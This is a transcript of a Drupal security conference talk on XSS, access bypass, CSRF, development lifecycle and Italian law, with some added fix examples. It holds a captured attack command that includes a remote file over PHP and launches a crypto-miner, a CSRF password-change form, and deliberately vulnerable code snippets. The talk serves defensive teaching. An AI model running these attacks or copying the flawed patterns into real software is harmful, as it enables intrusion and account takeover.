secure drupal, from start to finish
TRANSCRIPT
© Ibuildings 2014/2015 - All rights reserved
#DrupalDaysEU
Secure Drupal From start to finish
Speaker Info: Boy Baukema, Security Specialist
[email protected] / @relaxnow
• Security Specialist
• R&D Security
• Internal & External
• Security Training
• Consulting
• Security Audits
A Security what?
Gold Sponsors
/usr/sbin/apache2 -k start
 \_ /usr/sbin/apache2 -k start
     \_ /usr/local/php539/bin/php-cgi -dauto_prepend_file=http://XXX.XXX.XXX.XXX/one.txt -dallow_url_include=on
         \_ sh -c /tmp/sh.sh
             \_ ./minerd -a scrypt -o stratum+tcp://multi.ghash.io:3333 -u lscllc.worker16 -p x
Such hacked. Much coins.
[20:51:04] root@bal-XXXX.prod:/var/log/nginx# zgrep "POST / HTTP/1.1" access.log | egrep -o 'forwarded_for="[^\s,"]+?' | cut -d'"' -f2 | sort | uniq -c | sort -nr | head -30
   2112 104.130.25.XXX
   1144 37.221.162.XXX
   1067 185.13.37.XXX
   1066 77.247.181.XXX
   1058 77.109.141.XXX
   1047 5.135.158.XXX
   1042 178.175.139.XXX
HTTP Flood
• Drupal Top 3
• Secure Development Lifecycle
• The Law
The Plan
// to expand it out into a comma-delimited set of placeholders.
foreach (array_filter($args, 'is_array') as $key => $data) {
  $new_keys = array();
  foreach ($data as $i => $value) {
    // This assumes that there are no other placeholders that use the same
    // name. For example, if the array placeholder is defined as :example
    // and there is already an :example_2 placeholder, this will generate
/includes/database/database.inc
Source: http://drupalsecurityreport.org/sites/g/files/g598426/f/201403/drupal-security-whitepaper-1-3.pdf
/**
 * Preprocess function to replace the regular label with the
 * display label
 */
function field_display_label_preprocess_field(&$variables) {
  $field = field_info_instance(...);
  if (
    isset($field['display_label'])
    && strlen(trim($field['display_label'])) > 0
  ) {
    // The configured label is copied into the template as-is, without check_plain().
    $variables['label'] = $field['display_label'];
1. XSS
From: http://cgit.drupalcode.org/field_display_label/tree/field_display_label.module?id=e7f54e1ee44cd6f0fdbc16ac81f2cfb13f3d3d67
1. drupal_set_message
2. l
3. watchdog
Which function(s) should receive check_plain() content
Use t('@') syntax!
$text = t( "@name's blog", [ '@name' => format_username($account) ]);
Filter Input As early as possible
$_GET, $_POST, $_REQUEST, $_COOKIE, $_SERVER, $_FILES, $argv
everything from the database
$form_state (mostly ['input'])
arg()
drupal_get_query_parameters()
drupal_current_script_url()
drupal_detect_baseurl()
request_path()
What is input?
Sanitize:
  $id = (int) arg(1);
  $accountEnabled = (bool) arg(1);
Validate:
  Form validators
  in_array()
  mb_strlen() > 1024
  url_is_external()
  valid_url()
Filter / Sanitize / Validate
Encode Output As late as possible
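As an added example (not from the slides), a Drupal 7 page callback for a hypothetical path user/%/blog, first as the unsafe pattern and then with input filtered on entry and output encoded with the t('@') placeholder on exit; "mymodule" and its function names are made up for illustration.

```php
<?php
// Added example, not from the slides. "mymodule" and its functions are
// hypothetical; the Drupal 7 API calls (arg, user_load, t, format_username,
// drupal_set_message, watchdog) are real.

/**
 * UNSAFE: the raw path argument is trusted and the username is concatenated
 * straight into HTML. Usernames are stored as entered, so markup in a name
 * reaches the status message, the page and the log unescaped (stored XSS).
 */
function mymodule_blog_page_unsafe() {
  $account = user_load(arg(1));                                  // unvalidated input
  drupal_set_message("Viewing " . $account->name . "'s blog");  // Drupal does not escape this
  watchdog('mymodule', 'Viewed blog of ' . $account->name);     // message stored verbatim
  return '<h2>' . $account->name . "'s blog</h2>";              // XSS sink
}

/**
 * SAFE: filter input as early as possible, encode output as late as possible.
 */
function mymodule_blog_page() {
  // Sanitize: the path argument must be an integer uid.
  $uid = (int) arg(1);
  // Validate: reject nonsense ids and accounts that do not exist.
  if ($uid <= 0 || !($account = user_load($uid))) {
    return MENU_NOT_FOUND;
  }
  // '@name' runs check_plain() on the value; '%name' does the same and wraps
  // it in <em>; '!name' inserts it verbatim and must never carry user data.
  $name = format_username($account);   // returns an UNsanitized name
  $title = t("@name's blog", array('@name' => $name));
  // drupal_set_message() outputs what it is given: hand it sanitized text.
  drupal_set_message(t('Viewing @name', array('@name' => $name)));
  // watchdog() stores the raw value but applies the placeholder when the log
  // entry is rendered, so '@name' stays safe in the admin UI.
  watchdog('mymodule', 'Viewed blog of @name', array('@name' => $name));
  return '<h2>' . $title . '</h2>';
}
```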
// This is to be accessible to all users,
// so 'access callback' can be set
// to TRUE, meaning that we should
// bypass all access checks.
'access callback' => TRUE,
2. Access Bypass
global $user;
if ($user->uid = 1) {
  watchdog('mymodule', request_uri());
}
A disturbance in the force
• IDE / code sniffer (coder tools)
• if (1 = $uid)
• === instead of ==
• user_uid_optional_load($uid = NULL)
Avoiding accidental assign
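As an added example (not from the slides), hook_menu() items for a hypothetical "mymodule" that put the 'access callback' => TRUE bypass beside the permission-based form, plus the page callback with the accidental assignment replaced by a Yoda condition and strict comparison; the module, paths and permission name are invented.

```php
<?php
// Added example, not from the slides. "mymodule", its paths and its
// permission name are hypothetical; hook_menu(), hook_permission(),
// user_access() and watchdog() are the real Drupal 7 API.

function mymodule_menu() {
  $items = array();
  // BYPASS: 'access callback' => TRUE disables the access check entirely.
  // That is only right for a page meant to be public to anonymous users,
  // not for a report that merely "needs to be reachable by everyone".
  $items['mymodule/report-unsafe'] = array(
    'title' => 'Report',
    'page callback' => 'mymodule_report_page',
    'access callback' => TRUE,
  );
  // FIXED: leave 'access callback' at its default (user_access) and name a
  // permission, so roles decide who may see the page.
  $items['mymodule/report'] = array(
    'title' => 'Report',
    'page callback' => 'mymodule_report_page',
    'access arguments' => array('view mymodule reports'),
  );
  return $items;
}

function mymodule_permission() {
  return array(
    'view mymodule reports' => array('title' => t('View mymodule reports')),
  );
}

function mymodule_report_page() {
  global $user;
  // BUG from the slide: a single '=' assigns 1 to $user->uid, the condition
  // is always true, and every visitor is uid 1 for the rest of the request:
  //   if ($user->uid = 1) { ... }
  // Yoda condition + strict comparison: a dropped '=' is now a parse error.
  // A uid loaded from the database arrives as the string "1", so cast before
  // using ===, otherwise the check never matches.
  if (1 === (int) $user->uid) {
    watchdog('mymodule', 'Report viewed by uid 1 at @uri', array('@uri' => request_uri()));
  }
  return t('Report contents');
}
```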
<form action="http://mysite.com/contact" method="post" />
3. Cross Site Request Forgery
<form action="https://www.drupal.org/user/2457520/edit" method="post">
  <input type="hidden" name="pass[pass1]" value="hacked1" />
3. Cross Site Request Forgery
<script>$('#contactform').submit(); </script>
3. Cross Site Request Forgery
=> drupal_get_token
<= drupal_valid_token
Drupal Forms to the rescue!
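As an added example (not from the slides), the drupal_get_token() / drupal_valid_token() pair protecting a hypothetical "delete comment" link in Drupal 7, with a note on why forms built through the Form API get the same check for free; "mymodule" and its path are invented.

```php
<?php
// Added example, not from the slides. "mymodule" and its path are
// hypothetical; drupal_get_token(), drupal_valid_token(), l(),
// comment_delete() and the Form API behaviour described are real Drupal 7.

function mymodule_menu() {
  $items['mymodule/comment/%/delete'] = array(
    'title' => 'Delete comment',
    'page callback' => 'mymodule_comment_delete',
    'page arguments' => array(2),
    'access arguments' => array('administer comments'),
  );
  return $items;
}

/**
 * => drupal_get_token: the link carries a token derived from the session
 * and the exact action, so a page on another origin cannot compute it.
 */
function mymodule_comment_delete_link($cid) {
  $cid = (int) $cid;
  return l(t('Delete'), "mymodule/comment/$cid/delete", array(
    'query' => array('token' => drupal_get_token("mymodule-comment-delete-$cid")),
  ));
}

/**
 * <= drupal_valid_token: a forged <form method="post"> or <img src="..."> on
 * another site arrives with the victim's cookies but without the token, so
 * the state-changing action is refused before anything happens.
 */
function mymodule_comment_delete($cid) {
  $cid = (int) $cid;
  $token = isset($_GET['token']) ? $_GET['token'] : '';
  if (!drupal_valid_token($token, "mymodule-comment-delete-$cid")) {
    return MENU_ACCESS_DENIED;
  }
  comment_delete($cid);
  drupal_set_message(t('Comment deleted.'));
  drupal_goto('<front>');
}

// Forms built with drupal_get_form() need none of this: Form API adds a hidden
// form_token and drupal_validate_form() rejects a missing or wrong token
// before any submit handler runs. For anything destructive, a confirm_form()
// is the better choice over a GET link.
```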
• Authentication / Session
• Arbitrary Code Execution
• Denial of Service
• Information Disclosure
• Logic error
• Open Redirect
• Password Protection Bypass
• Session Fixation
• SQL Injection
• ....
4. Others
1. Education & Guidance
• Threat Assessment
• Security Requirements
2. Design time security
• Architecture Review
• Code Review
3. Security Review
4. Security Testing
The OWASP Application Security Verification Standard (ASVS) Project
provides a basis for testing web application technical security
controls.
• Identify third party dependencies
• ... follow their Security Mailinglists
• Make rebuilding painless.
• Make redeploying painless.
• Backup & restore from backup 'regularly'
5. Vulnerability Management
The Law
The penalty for failure to adopt the minimum measures is that of Article 169 of the Code (imprisonment of up to two years);
Damages: the manager bears the burden of proving that he did everything possible to avoid the damage, with reference to the known best practices of computer security, while the victim only has to prove that the damage exists.
Minimum security measures (Misure minime di sicurezza)
• Individually associated accounts
• > 8 character passwords
• Changed every 3 to 6 months
• Do not leave admin unattended
• Privileges on need to know basis
• Verify privileges at least yearly
• Update at least every 6 months
• Backup data at least weekly
Technical specification (Disciplinare tecnico)
Bob's Story
Responsible Disclosure
• Know your law
• Think like an attacker
• ... but don't become one (without permission)
• Make sure white hats have a place to go
• Filter Input, Encode Output
• Train your developers
• Design with security in mind
• Review and be critical
• Trust but verify that you are secure
• Perform active automated maintenance
In summary
• http://www.slideshare.net/relaxnow/drupaldays-2015
• http://crackingdrupal.com
• http://drupalsecurityreport.com
• http://drupal.org/writing-secure-code
• http://owasp.org
• OWASP ASVS
The End